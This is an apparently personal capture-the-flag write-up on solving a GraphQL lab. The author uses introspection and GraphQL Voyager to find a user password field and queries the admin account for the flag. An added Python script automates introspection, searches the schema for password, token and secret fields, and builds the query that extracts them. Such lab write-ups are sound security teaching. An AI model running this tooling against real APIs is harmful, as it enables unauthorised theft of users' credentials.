Ottergram

GraphQL made its long-awaited return!

A brand-new lab made my day today. When I opened the lab there was literally no hint, so not much to go on. As usual, I clicked around the app, made a second account and made sure I exercised the functionality behind every button I could possibly click. After that, it was time to see what Burp Suite had captured.

First thing I noticed was a /graphql endpoint. So that was my first stop.

The first thing to try with GraphQL is introspection: asking the endpoint to describe its own schema. Send the request to Repeater, right-click it and use Burp's "Set introspection query" option to swap the body for the introspection query.

Should that work (and in this case it did), I copied the result and pasted it into https://apis.guru/graphql-voyager/ to render the schema.

In this visual, I saw that I could query the user and, with it, the password field. In the past the flag has sometimes been the password of the admin account (id:2), so that's where I looked first.
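Voyager is handy, but the same triage can be done in a few lines: send the introspection query, scan every object type for fields whose name looks sensitive (password, token, ...), find the root query field that returns that type, and assemble the query to pull it. The script below is an added example, not code from the original post or from the lab; the introspection response it parses is constructed inline, and the type and field names in it (User, user(id), password) are assumptions that stand in for whatever the real schema exposed.

```python
import json
import urllib.request

# Trimmed introspection query: every type, its fields, each field's args, and
# the (possibly wrapped) return type. Burp's "Set introspection query" sends
# a fuller version of this.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    types {
      name
      kind
      fields {
        name
        args { name type { name kind ofType { name kind } } }
        type { name kind ofType { name kind ofType { name kind } } }
      }
    }
  }
}
"""

# Constructed sample response (assumption, not the lab's real schema).
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "user",
             "args": [{"name": "id", "type": {"name": None, "kind": "NON_NULL",
                                              "ofType": {"name": "Int", "kind": "SCALAR"}}}],
             "type": {"name": "User", "kind": "OBJECT", "ofType": None}},
            {"name": "images", "args": [],
             "type": {"name": None, "kind": "LIST",
                      "ofType": {"name": "Image", "kind": "OBJECT"}}}]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "id", "args": [], "type": {"name": "Int", "kind": "SCALAR", "ofType": None}},
            {"name": "username", "args": [], "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
            {"name": "password", "args": [], "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]},
        {"name": "Image", "kind": "OBJECT", "fields": [
            {"name": "url", "args": [], "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]},
        {"name": "String", "kind": "SCALAR", "fields": None},
        {"name": "Int", "kind": "SCALAR", "fields": None},
    ]}}}


def named_type(t):
    """Strip NON_NULL / LIST wrappers and return the underlying type name."""
    while t and t.get("name") is None:
        t = t.get("ofType")
    return t["name"] if t else None


def object_types(introspection):
    """Map object type name -> field list, skipping GraphQL's own __ types."""
    return {t["name"]: t["fields"] or []
            for t in introspection["data"]["__schema"]["types"]
            if t["kind"] == "OBJECT" and not t["name"].startswith("__")}


def find_sensitive_fields(introspection, needles=("password", "token", "secret", "hash")):
    """Return (type, field) pairs whose field name contains one of the needles."""
    return [(tname, f["name"])
            for tname, fields in object_types(introspection).items()
            for f in fields
            if any(n in f["name"].lower() for n in needles)]


def paths_to_type(introspection, target):
    """Root query fields that return `target`, with the argument names each takes."""
    root = introspection["data"]["__schema"]["queryType"]["name"]
    return [(f["name"], [a["name"] for a in f["args"]])
            for f in object_types(introspection)[root]
            if named_type(f["type"]) == target]


def build_query(root_field, args, fields):
    """Assemble e.g. { user(id: 2) { id username password } } from the pieces."""
    arglist = ", ".join(f"{k}: {json.dumps(v)}" for k, v in args.items())
    selection = " ".join(fields)
    head = f"{root_field}({arglist})" if arglist else root_field
    return f"{{ {head} {{ {selection} }} }}"


def post_graphql(url, query, variables=None):
    """POST a query as JSON, the way the app's own front end does."""
    body = json.dumps({"query": query, "variables": variables or {}}).encode()
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Against a live target: schema = post_graphql("https://TARGET/graphql", INTROSPECTION_QUERY)
    schema = SAMPLE_INTROSPECTION
    for tname, _ in find_sensitive_fields(schema):
        all_fields = [f["name"] for f in object_types(schema)[tname]]
        for root_field, arg_names in paths_to_type(schema, tname):
            # id 2 is where the admin account has lived in earlier labs.
            print(build_query(root_field, {a: 2 for a in arg_names}, all_fields))
```

On the constructed schema this prints `{ user(id: 2) { id username password } }`, which is exactly the request to paste into Repeater. If introspection is disabled, the script has nothing to work with, and you fall back to field-suggestion errors or a wordlist of common field names.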

A bit of both luck and experience with the way these labs are built, but I got my flag 🇧🇪
